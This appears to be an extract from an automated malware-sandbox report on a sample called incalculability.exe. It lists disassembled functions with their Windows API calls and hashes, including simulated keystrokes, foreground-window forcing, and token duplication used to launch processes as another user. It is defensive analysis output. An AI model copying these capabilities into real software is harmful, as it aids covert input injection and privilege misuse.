                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                            • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                            • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                            • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                            Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                            • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                            • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                            Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                            • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                            • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                            • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                            Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                            • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                            • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                            • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                            Function 00444AF8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • _memmove.LIBCMT ref: 00444B34
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _malloc_memmove
                            • String ID:
                            • API String ID: 1183979061-0
                            • Opcode ID: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                            • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                            • Opcode Fuzzy Hash: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                            • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                            Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __lock_file
                            • String ID:
                            • API String ID: 3031932315-0
                            • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                            • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                            • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                            • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                            Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                            Download Yara Rule
                            APIs
                            • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                            • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                            • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                            • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                            Function 03F26110 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNELBASE(?), ref: 03F2611B
                            Memory Dump Source
                            • Source File: 00000005.00000002.1900399949.0000000003F25000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3f25000_incalculability.jbxd
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                            • Instruction ID: f9875edb1435160fb3b0cbb6b35c6b67aa44faa9f5ef81fb94b5aa76aa77703f
                            • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                            • Instruction Fuzzy Hash: 6EE0C231A1521CEBCB20CBB8CC04AAD7BA8D705724F004754E847C32C1D5B5AAA19714
                            Function 03F260E0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNELBASE(?), ref: 03F260EB
                            Memory Dump Source
                            • Source File: 00000005.00000002.1900399949.0000000003F25000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3f25000_incalculability.jbxd
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                            • Instruction ID: f8ffbbbbb80e6d4d71e232cae591ca9d4a9ae2a55e4bf6e7f046636322e581fe
                            • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                            • Instruction Fuzzy Hash: B1D0A73190520CEBCB10CFB89C049DA7BACD704321F004764FD15C3280DA7199409750
                            Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __wfsopen
                            • String ID:
                            • API String ID: 197181222-0
                            • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                            • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                            • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                            • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                            Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                            • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                            • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                            • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                            Function 03F27B1C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNELBASE(000001F4), ref: 03F27B31
                            Memory Dump Source
                            • Source File: 00000005.00000002.1900399949.0000000003F25000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3f25000_incalculability.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                            • Instruction ID: f492a1d406a90fa8b83a28076c011e45d8e32e8b4016b9ae24bc8000ed8c4efa
                            • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                            • Instruction Fuzzy Hash: 7EE0BF7494110DEFDB00EFA8D9496DE7FB4EF04702F1005A1FD05D7681DB309E548A62
                            Function 03F27B20 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNELBASE(000001F4), ref: 03F27B31
                            Memory Dump Source
                            • Source File: 00000005.00000002.1900399949.0000000003F25000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3f25000_incalculability.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction ID: 74e54c2194ef16152f9982e12e56a8bb218fc7ff852a7d4ed337ce308aefa0ee
                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction Fuzzy Hash: E2E0E67494110DDFDB00EFB8D94969E7FB4EF04702F1001A1FD01D2281D6309D508A72

                            Non-executed Functions

                            Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                            • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                            • GetKeyState.USER32(00000011), ref: 0047C92D
                            • GetKeyState.USER32(00000009), ref: 0047C936
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                            • GetKeyState.USER32(00000010), ref: 0047C953
                            • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                            • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                            • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                            • _wcsncpy.LIBCMT ref: 0047CA29
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                            • SendMessageW.USER32 ref: 0047CA7F
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                            • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                            • ImageList_SetDragCursorImage.COMCTL32(009099B8,00000000,00000000,00000000), ref: 0047CB9B
                            • ImageList_BeginDrag.COMCTL32(009099B8,00000000,000000F8,000000F0), ref: 0047CBAC
                            • SetCapture.USER32(?), ref: 0047CBB6
                            • ClientToScreen.USER32(?,?), ref: 0047CC17
                            • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                            • ReleaseCapture.USER32 ref: 0047CC3A
                            • GetCursorPos.USER32(?), ref: 0047CC72
                            • ScreenToClient.USER32(?,?), ref: 0047CC80
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                            • SendMessageW.USER32 ref: 0047CD12
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                            • SendMessageW.USER32 ref: 0047CD80
                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                            • GetCursorPos.USER32(?), ref: 0047CDC8
                            • ScreenToClient.USER32(?,?), ref: 0047CDD6
                            • GetParent.USER32(00000000), ref: 0047CDF7
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                            • SendMessageW.USER32 ref: 0047CE93
                            • ClientToScreen.USER32(?,?), ref: 0047CEEE
                            • TrackPopupMenuEx.USER32(?,00000000,?,?,02E11B70,00000000,?,?,?,?), ref: 0047CF1C
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                            • SendMessageW.USER32 ref: 0047CF6B
                            • ClientToScreen.USER32(?,?), ref: 0047CFB5
                            • TrackPopupMenuEx.USER32(?,00000080,?,?,02E11B70,00000000,?,?,?,?), ref: 0047CFE6
                            • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                            • String ID: @GUI_DRAGID$F
                            • API String ID: 3100379633-4164748364
                            • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                            • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                            • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                            • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                            Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32 ref: 00434420
                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                            • IsIconic.USER32(?), ref: 0043444F
                            • ShowWindow.USER32(?,00000009), ref: 0043445C
                            • SetForegroundWindow.USER32(?), ref: 0043446A
                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                            • GetCurrentThreadId.KERNEL32 ref: 00434485
                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                            • SetForegroundWindow.USER32(00000000), ref: 004344B7
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                            • keybd_event.USER32(00000012,00000000), ref: 004344CF
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                            • keybd_event.USER32(00000012,00000000), ref: 004344E6
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                            • keybd_event.USER32(00000012,00000000), ref: 004344FD
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                            • keybd_event.USER32(00000012,00000000), ref: 00434514
                            • SetForegroundWindow.USER32(00000000), ref: 0043451E
                            • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                            • String ID: Shell_TrayWnd
                            • API String ID: 2889586943-2988720461
                            • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                            • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                            • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                            • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                            Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                            Download Yara Rule
                            APIs
                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                            • CloseHandle.KERNEL32(?), ref: 004463A0
                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                            • GetProcessWindowStation.USER32 ref: 004463D1
                            • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                            • _wcslen.LIBCMT ref: 00446498
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • _wcsncpy.LIBCMT ref: 004464C0
                            • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                            • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                            • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                            • UnloadUserProfile.USERENV(?,?), ref: 00446555
                            • CloseWindowStation.USER32(00000000), ref: 0044656C
                            • CloseDesktop.USER32(?), ref: 0044657A
                            • SetProcessWindowStation.USER32(?), ref: 00446588
                            • CloseHandle.KERNEL32(?), ref: 00446592
                            • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                            • String ID: $@OH$default$winsta0
                            • API String ID: 3324942560-3791954436
                            • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                            • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                            • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                            • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                            Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\inhumate\incalculability.exe,0040F545,C:\Users\user\AppData\Local\inhumate\incalculability.exe,004A90E8,C:\Users\user\AppData\Local\inhumate\incalculability.exe,?,0040F545), ref: 0041013C
                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                              • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
